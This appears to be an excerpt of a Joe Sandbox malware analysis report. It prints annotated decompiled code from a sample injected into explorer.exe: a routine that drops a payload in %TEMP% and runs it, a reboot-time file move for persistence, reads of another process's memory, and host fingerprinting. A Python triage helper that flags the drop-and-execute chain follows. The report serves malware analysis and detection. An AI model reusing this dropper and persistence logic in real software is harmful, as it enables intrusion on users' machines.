    								return E007C763C( &_v273);
    							}
    						}
    					}
    				}
    				return _t38;
    			}

    APIs
      • Part of subcall function 007C3FC8: CoInitialize.OLE32(00000000), ref: 007C4001
      • Part of subcall function 007C3FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007C4089
      • Part of subcall function 007C3FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 007C40A7
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    • MoveFileExA.KERNEL32(?,C:\Program Files\Windows NT\dnsar.exe,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 007C7857
      • Part of subcall function 007C4968: SHGetValueA.SHLWAPI(?,007C1DAC,?,00000001,00000000,?), ref: 007C49B1
      • Part of subcall function 007C4968: RegOpenKeyExA.ADVAPI32(?,007C1DAC,00000000,000F003F,?), ref: 007C49D0
      • Part of subcall function 007C485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C4886
      • Part of subcall function 007C485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007C48A7
      • Part of subcall function 007C485C: FlushFileBuffers.KERNEL32(000000FF), ref: 007C48C4
      • Part of subcall function 007C485C: CloseHandle.KERNEL32(000000FF), ref: 007C48CE
      • Part of subcall function 007C763C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C7658
      • Part of subcall function 007C763C: GetFileSize.KERNEL32(000000FF,00000000), ref: 007C766D
      • Part of subcall function 007C763C: CloseHandle.KERNEL32(000000FF), ref: 007C768A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 35%
    			E007C92CD() {
    				void* _t3;
    				intOrPtr _t11;
    				intOrPtr* _t18;
    				intOrPtr* _t21;
    				void* _t24;
    				void* _t25;
    
    				_t3 =  *_t21();
    				_t28 = _t3;
    				if(_t3 != 0) {
    					 *_t18(0);
    				}
    				_pop(_t22);
    				_pop(_t19);
    				GetModuleFileNameA(0, _t25 - 0x117 + 2, 0x103);
    				 *0x7ca06c = E007C7C50(_t25 - 0x117 + 2);
    				_t11 =  *0x7ca06c; // 0x5b392e46
    				wsprintfA("1530474054", E007C9468, _t11);
    				_push(GetCursorPos(0x7ca578));
    				E007C69BC(_t24, _t28);
    				goto __eax;
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 007C92F0
      • Part of subcall function 007C7C50: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C7C71
      • Part of subcall function 007C7C50: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C7C93
      • Part of subcall function 007C7C50: ReadFile.KERNEL32(000000FF,?,00000040,?,00000000), ref: 007C7CB2
      • Part of subcall function 007C7C50: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000), ref: 007C7CC7
      • Part of subcall function 007C7C50: ReadFile.KERNEL32(000000FF,?,00000014,?,00000000), ref: 007C7CDD
      • Part of subcall function 007C7C50: CloseHandle.KERNEL32(000000FF), ref: 007C7CE7
    • wsprintfA.USER32 ref: 007C9319
    • GetCursorPos.USER32(007CA578), ref: 007C9327
      • Part of subcall function 007C69BC: GetTempPathA.KERNEL32(00000101,?), ref: 007C69E1
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 82%
    			E007C4EF0(void* __eax, void* __eflags) {
    				void* _v8;
    				void _v12;
    				void* _v16;
    				void _v20;
    				void _v24;
    				void* _v28;
    				void* _v32;
    				long _v36;
    				intOrPtr* _v40;
    				void* _v52;
    				void _v64;
    				signed int _t63;
    				signed int _t72;
    				signed int _t88;
    				signed int _t96;
    
    				_v8 = __eax;
    				_v24 = 0;
    				_v12 = 0;
    				_v28 = E007C13DC(0x1000);
    				_v32 = E007C4E94(_v8);
    				if(_v32 != 0) {
    					_t63 = ReadProcessMemory(_v8, _v32, _v28, 0x1000,  &_v36);
    					asm("sbb eax, eax");
    					if( ~( ~_t63) != 0) {
    						_t72 = ReadProcessMemory(_v8,  *((intOrPtr*)(_v28 + 0x3c)) + _v32, _v28, 0x1000,  &_v36);
    						asm("sbb eax, eax");
    						if( ~( ~_t72) != 0) {
    							_v24 =  *((intOrPtr*)(_v28 + 0x28)) + _v32;
    							_v40 = _v28 + 0xc0;
    							if( *_v40 != 0 &&  *((intOrPtr*)(_v40 + 4)) != 0) {
    								_t88 = ReadProcessMemory(_v8,  *_v40 + _v32,  &_v64, 0x18,  &_v36);
    								asm("sbb eax, eax");
    								if( ~( ~_t88) != 0) {
    									_v16 = _v52;
    									if(_v16 != 0) {
    										_t96 = ReadProcessMemory(_v8, _v16, _v28, 0x1000,  &_v36);
    										asm("sbb eax, eax");
    										if( ~( ~_t96) != 0) {
    											_v20 =  *_v28;
    											if(_v20 != 0) {
    												_v24 = _v20;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				E007C1440(_v28);
    				_v12 = _v24;
    				return _v12;
    			}

    APIs
      • Part of subcall function 007C13DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007C13EB
      • Part of subcall function 007C13DC: RtlAllocateHeap.NTDLL(00000000), ref: 007C13F2
      • Part of subcall function 007C4E94: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 007C4EAD
      • Part of subcall function 007C4E94: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 007C4EDD
    • ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F3A
    • ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F69
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 007C4FBC
    • ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 007C4FED
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			// Write-to-file helper: writes __ecx bytes from the buffer in __edx to the path in __eax.
    			// CreateFileA arguments: 0x40000000 = GENERIC_WRITE, 2 = CREATE_ALWAYS (overwrite), 0x80 = FILE_ATTRIBUTE_NORMAL.
    			// Returns 0xffffffff (all-ones TRUE) only when every byte was written, otherwise 0.
    			E007C485C(CHAR* __eax, long __ecx, void* __edx) {
    				CHAR* _v8;   // path
    				void* _v12;  // data
    				long _v16;   // length
    				intOrPtr _v20;  // result
    				void* _v24;  // file handle
    				long _v28;   // bytes written
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				_v24 = CreateFileA(_v8, 0x40000000, 0, 0, 2, 0x80, 0);
    				if(_v24 != 0xffffffff) { // INVALID_HANDLE_VALUE
    					if(WriteFile(_v24, _v12, _v16,  &_v28, 0) != 0 && _v28 == _v16) { // success only on a complete write
    						_v20 = 0xffffffff;
    					}
    					FlushFileBuffers(_v24);
    					CloseHandle(_v24);
    				}
    				return _v20;
    			}

    Instruction addresses (one per decompiled line): 0x007c4862 0x007c4865 0x007c4868 0x007c486d 0x007c488c 0x007c4893 0x007c48af 0x007c48b9 0x007c48b9 0x007c48c4 0x007c48ce 0x007c48ce 0x007c48da

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C4886
    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 007C48A7
    • FlushFileBuffers.KERNEL32(000000FF), ref: 007C48C4
    • CloseHandle.KERNEL32(000000FF), ref: 007C48CE
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			// Drop-and-execute routine. __eax points to a string that is scanned for '/' (0x2f), so it is
    			// a URL or a forward-slash path; the component after the last '/' becomes the file name under
    			// %TEMP%. E007C3C28 writes the payload there (its subcalls are CreateFileA/WriteFile/CloseHandle,
    			// see the APIs list below) and the file is then launched with ShellExecuteA.
    			// E007C1308 / E007C133C behave as string assign / append helpers (inferred from their use here).
    			E007C7D3C(void* __eax, void* __ecx, void* __edx) {
    				void* _v8;    // input string
    				void* _v12;   // scan cursor
    				void* _v16;   // last '/' seen
    				void* _v20;   // ShellExecuteA result
    				char _v85;    // formatted error text
    				char _v342;   // path buffer
    				void* _t34;
    				intOrPtr _t42;
    				void* _t55;
    				intOrPtr _t58;
    
    				_t55 = __ecx;
    				_v8 = __eax;
    				_v342 = 0;
    				GetTempPathA(0x101,  &_v342); // 0x101 = MAX_PATH + 1
    				_v12 = _v8;
    				_v16 = 0;
    				while(1) { // find the last '/' in the input string
    					_t34 = _v12;
    					if( *_t34 == 0) {
    						break;
    					}
    					__eflags =  *_v12 - 0x2f;
    					if( *_v12 == 0x2f) {
    						_v16 = _v12;
    					}
    					_t10 =  &_v12;
    					 *_t10 = _v12 + 1;
    					__eflags =  *_t10;
    				}
    				if(_v16 != 0) {
    					_v16 = _v16 + 1; // file-name component after the last '/'
    					E007C133C( &_v342, _v16); // temp path + file name
    					if(E007C3C28(_v8, _t55,  &_v342) == 0) { // write the payload to that path; 0 = failure
    						_t42 =  *0x7ca170; // 0x7c1e04
    						return E007C7240(_t42, __eflags); // hand the failure string at 0x7c1e04 to E007C7240 (body not in this excerpt)
    					}
    					_t34 = ShellExecuteA(0, 0,  &_v342, 0, 0, 5); // nShowCmd 5 = SW_SHOW
    					_v20 = _t34;
    					_t66 = _v20 - 0x20;
    					if(_v20 <= 0x20) { // ShellExecute returns a value <= 32 on error
    						E007C1864(_v20,  &_v85); // wsprintfA: render the error code as text
    						_t58 =  *0x7ca16c; // 0x7c1df8
    						E007C1308( &_v342, _t58); // message prefix from the string at 0x7c1df8
    						E007C133C( &_v342,  &_v85); // followed by the error text
    						return E007C7240( &_v342, _t66); // report the message
    					}
    				}
    				return _t34;
    			}

    Instruction addresses (one per decompiled line): 0x007c7d3c 0x007c7d45 0x007c7d48 0x007c7d5b 0x007c7d64 0x007c7d69 0x007c7d7f 0x007c7d7f 0x007c7d85 0x00000000 0x00000000 0x007c7d71 0x007c7d74 0x007c7d79 0x007c7d79 0x007c7d7c 0x007c7d7c 0x007c7d7c 0x007c7d7c 0x007c7d8b 0x007c7d91 0x007c7d9f 0x007c7db7 0x007c7e1a 0x00000000 0x007c7e1f 0x007c7dca 0x007c7dd0 0x007c7dd3 0x007c7dd7 0x007c7de1 0x007c7def 0x007c7df5 0x007c7e05 0x00000000 0x007c7e13 0x007c7dd7 0x007c7e27

    APIs
    • GetTempPathA.KERNEL32(00000101,00000000), ref: 007C7D5B
      • Part of subcall function 007C3C28: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C3E08
      • Part of subcall function 007C3C28: WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 007C3E55
      • Part of subcall function 007C3C28: CloseHandle.KERNEL32(000000FF), ref: 007C3E6B
    • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 007C7DCA
      • Part of subcall function 007C1864: wsprintfA.USER32 ref: 007C1874
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 92%
    			// Misaligned decompilation: this entry lies 4 bytes before E007C6904 (the address column starts
    			// 0x007c6900, 0x007c6901, 0x007c6903 and then joins 0x007c690d), so the `das` and the two
    			// statements that follow it are junk from decoding mid-instruction. From `_v8 = __eax` on,
    			// the body is identical to E007C6904 below, which is the real routine; read the comments there.
    			E007C6900(intOrPtr __eax, void* __edx) {
    				intOrPtr _v8;
    				long _v12;
    				signed int _v16;
    				signed int _v20;
    				void* _v24;
    				intOrPtr _v117;
    				char _v153;
    				char* _t30;
    				intOrPtr _t35;
    
    				asm("das"); // junk: bytes of the preceding function, not real code
    				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax; // junk
    				_v117 = _v117 + __edx; // junk
    				_v8 = __eax; // real function body starts here (0x007c690d)
    				_v16 = 0;
    				_v12 = 0x81;
    				if(GetComputerNameA( &_v153,  &_v12) != 0) {
    					_v16 = E007C1BA8(_v16, E007C12DC( &_v153),  &_v153);
    				}
    				_t30 =  *0x7ca25c; // 0x7c2174
    				RegOpenKeyExA(0x80000002, _t30, 0, 0x20119,  &_v24);
    				_v12 = 4;
    				_v20 = 0;
    				_t35 =  *0x7ca0f0; // 0x7c1d3c
    				E007C38B0(_v24, _t35, 0, 0,  &_v20,  &_v12);
    				E007C3890(_v24);
    				_v16 = _v16 ^ _v20 ^ 0xac67baee;
    				return E007C1164(_v16, _v8);
    			}

    Instruction addresses (one per decompiled line): 0x007c6900 0x007c6901 0x007c6903 0x007c690d 0x007c6912 0x007c6915 0x007c692f 0x007c694c 0x007c694c 0x007c695a 0x007c6965 0x007c696b 0x007c6974 0x007c6983 0x007c698d 0x007c6998 0x007c69a8 0x007c69b9

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 007C6927
    • RegOpenKeyExA.ADVAPI32(80000002,007C2174,00000000,00020119,?), ref: 007C6965
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 100%
    			// Host fingerprint: hash of the computer name (E007C1BA8; the hash itself is not in this excerpt)
    			// XOR a DWORD read from a value under HKEY_LOCAL_MACHINE (key name at 0x7c2174, value name at
    			// 0x7c1d3c; neither string is shown here) XOR the constant 0xac67baee. The result goes to
    			// E007C1164 together with the __eax context pointer.
    			E007C6904(intOrPtr __eax) {
    				intOrPtr _v8;
    				long _v12;        // in/out size for GetComputerNameA, then for the registry read
    				signed int _v16;  // running fingerprint
    				signed int _v20;  // DWORD read from the registry
    				void* _v24;       // HKEY
    				char _v153;       // computer name buffer
    				char* _t28;
    				intOrPtr _t33;
    
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x81;
    				if(GetComputerNameA( &_v153,  &_v12) != 0) {
    					_v16 = E007C1BA8(_v16, E007C12DC( &_v153),  &_v153); // hash(seed, length, name); E007C12DC is a length helper (inferred)
    				}
    				_t28 =  *0x7ca25c; // 0x7c2174
    				// 0x80000002 = HKEY_LOCAL_MACHINE; 0x20119 = KEY_READ | KEY_WOW64_64KEY, i.e. the 64-bit
    				// registry view from this 32-bit code. The return value is not checked, so _v24 is used as-is.
    				RegOpenKeyExA(0x80000002, _t28, 0, 0x20119,  &_v24);
    				_v12 = 4; // expects a REG_DWORD
    				_v20 = 0;
    				_t33 =  *0x7ca0f0; // 0x7c1d3c
    				E007C38B0(_v24, _t33, 0, 0,  &_v20,  &_v12); // RegQueryValueExA wrapper (see APIs below)
    				E007C3890(_v24); // RegCloseKey wrapper
    				_v16 = _v16 ^ _v20 ^ 0xac67baee;
    				return E007C1164(_v16, _v8);
    			}

    Instruction addresses (one per decompiled line): 0x007c690d 0x007c6912 0x007c6915 0x007c692f 0x007c694c 0x007c694c 0x007c695a 0x007c6965 0x007c696b 0x007c6974 0x007c6983 0x007c698d 0x007c6998 0x007c69a8 0x007c69b9

    APIs
    • GetComputerNameA.KERNEL32(?,?), ref: 007C6927
    • RegOpenKeyExA.ADVAPI32(80000002,007C2174,00000000,00020119,?), ref: 007C6965
      • Part of subcall function 007C38B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,007C6992,?,007C1D3C,00000000,00000000,?,?), ref: 007C38CC
      • Part of subcall function 007C3890: RegCloseKey.ADVAPI32(?), ref: 007C389D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
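    The API panels above only show raw hex arguments, so the meaning of each call (GENERIC_WRITE + CREATE_ALWAYS, HKLM with KEY_WOW64_64KEY, SW_SHOW, a 0x18-byte ProcessBasicInformation query) has to be decoded by hand, and the drop-to-%TEMP%-and-ShellExecute chain of E007C7D3C is spread over several panels. The script below is an added triage helper for this report format, not part of the Joe Sandbox output or of the sample: it parses lines in the "Name.MODULE(args), ref: ADDR" shape, decodes the constants that matter (tables taken from the Windows SDK headers, assumed correct as listed), and looks for the GetTempPath -> CreateFile(write, create) -> WriteFile -> execute sequence. The sample input is constructed by copying lines from the panels above and stripping their bullets and "Part of subcall" prefixes.

```python
import re

# Constructed sample: API lines copied from the function panels above.
SAMPLE_LINES = """\
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 007C4EAD
ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 007C4F3A
GetTempPathA.KERNEL32(00000101,00000000), ref: 007C7D5B
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 007C3E08
WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 007C3E55
CloseHandle.KERNEL32(000000FF), ref: 007C3E6B
ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 007C7DCA
GetComputerNameA.KERNEL32(?,?), ref: 007C6927
RegOpenKeyExA.ADVAPI32(80000002,007C2174,00000000,00020119,?), ref: 007C6965
"""

# "Name.MODULE(arg,arg,...), ref: ADDR" as the report prints it; '?' = unresolved argument
LINE_RE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

# Constant tables from winnt.h / winreg.h / winuser.h (assumed correct as listed).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_READ = 0x20019  # STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
KEY_BITS = [(0x0001, "KEY_QUERY_VALUE"), (0x0002, "KEY_SET_VALUE"),
            (0x0004, "KEY_CREATE_SUB_KEY"), (0x0008, "KEY_ENUMERATE_SUB_KEYS"),
            (0x0010, "KEY_NOTIFY"), (0x0020, "KEY_CREATE_LINK"),
            (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY"),
            (0x20000, "READ_CONTROL")]
SW_SHOW = 5
PBI_SIZE_X86 = 0x18  # sizeof(PROCESS_BASIC_INFORMATION) in a 32-bit process

# Stages of a drop-and-execute chain; each stage is satisfied by any API in its set.
DROP_EXEC_STAGES = [
    {"GetTempPathA", "GetTempPathW"},
    {"CreateFileA", "CreateFileW"},
    {"WriteFile"},
    {"ShellExecuteA", "ShellExecuteW", "WinExec", "CreateProcessA", "CreateProcessW"},
]


def parse_api_line(line):
    """Return {'api', 'module', 'args', 'ref'} for one API line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    api, module, args, ref = m.groups()
    parsed = [None if a == "?" else int(a, 16) for a in args.split(",")] if args else []
    return {"api": api, "module": module, "args": parsed, "ref": int(ref, 16)}


def decode_key_access(mask):
    """Expand a RegOpenKeyEx samDesired mask, e.g. 0x20119 -> 'KEY_READ | KEY_WOW64_64KEY'."""
    names = []
    if mask & KEY_READ == KEY_READ:
        names.append("KEY_READ")
        mask &= ~KEY_READ
    for bit, name in KEY_BITS:
        if mask & bit:
            names.append(name)
            mask &= ~bit
    if mask:
        names.append(hex(mask))  # anything the table does not know stays numeric
    return " | ".join(names)


def describe(call):
    """One-line meaning of a call, decoding the numeric arguments that matter for triage."""
    api, a = call["api"], call["args"]
    if api == "CreateFileA" and len(a) >= 5:
        access = " | ".join(n for v, n in GENERIC_ACCESS.items() if a[1] is not None and a[1] & v)
        return f"CreateFileA access={access or a[1]} disposition={CREATE_DISPOSITION.get(a[4], a[4])}"
    if api == "RegOpenKeyExA" and len(a) >= 4:
        return f"RegOpenKeyExA root={HKEY_ROOTS.get(a[0], a[0])} access={decode_key_access(a[3] or 0)}"
    if api == "ShellExecuteA" and len(a) >= 6:
        return f"ShellExecuteA nShowCmd={'SW_SHOW' if a[5] == SW_SHOW else a[5]}"
    if api == "NtQueryInformationProcess" and len(a) >= 4:
        cls = "ProcessBasicInformation" if a[1] == 0 else f"class {a[1]}"
        layout = " (x86 PROCESS_BASIC_INFORMATION, i.e. a PEB lookup)" if a[3] == PBI_SIZE_X86 else ""
        return f"NtQueryInformationProcess {cls} len={hex(a[3])}{layout}"
    return api


def find_drop_and_execute(calls):
    """Return the ref addresses of a temp-path -> create(write) -> write -> execute chain, or [] if absent."""
    chain, stage = [], 0
    for c in calls:
        if c["api"] not in DROP_EXEC_STAGES[stage]:
            continue
        if stage == 1:  # CreateFile must open for writing with a creating disposition
            a = c["args"]
            if len(a) < 5 or not a[1] or not a[1] & 0x40000000 or a[4] not in (1, 2, 4):
                continue
        chain.append(c["ref"])
        stage += 1
        if stage == len(DROP_EXEC_STAGES):
            return chain
    return []


def triage(text):
    """Parse a block of API lines; return (per-call descriptions, drop-and-execute chain refs)."""
    calls = [c for c in map(parse_api_line, text.splitlines()) if c]
    return [describe(c) for c in calls], find_drop_and_execute(calls)


if __name__ == "__main__":
    notes, chain = triage(SAMPLE_LINES)
    print("\n".join(notes))
    print("drop-and-execute chain at refs:", [hex(r) for r in chain])
```

    On the sample lines the chain resolves to refs 007C7D5B, 007C3E08, 007C3E55 and 007C7DCA, which is exactly the E007C7D3C path through its E007C3C28 subcall; the registry mask decodes to KEY_READ | KEY_WOW64_64KEY, which tells you the 32-bit code is deliberately reading the 64-bit view of HKLM.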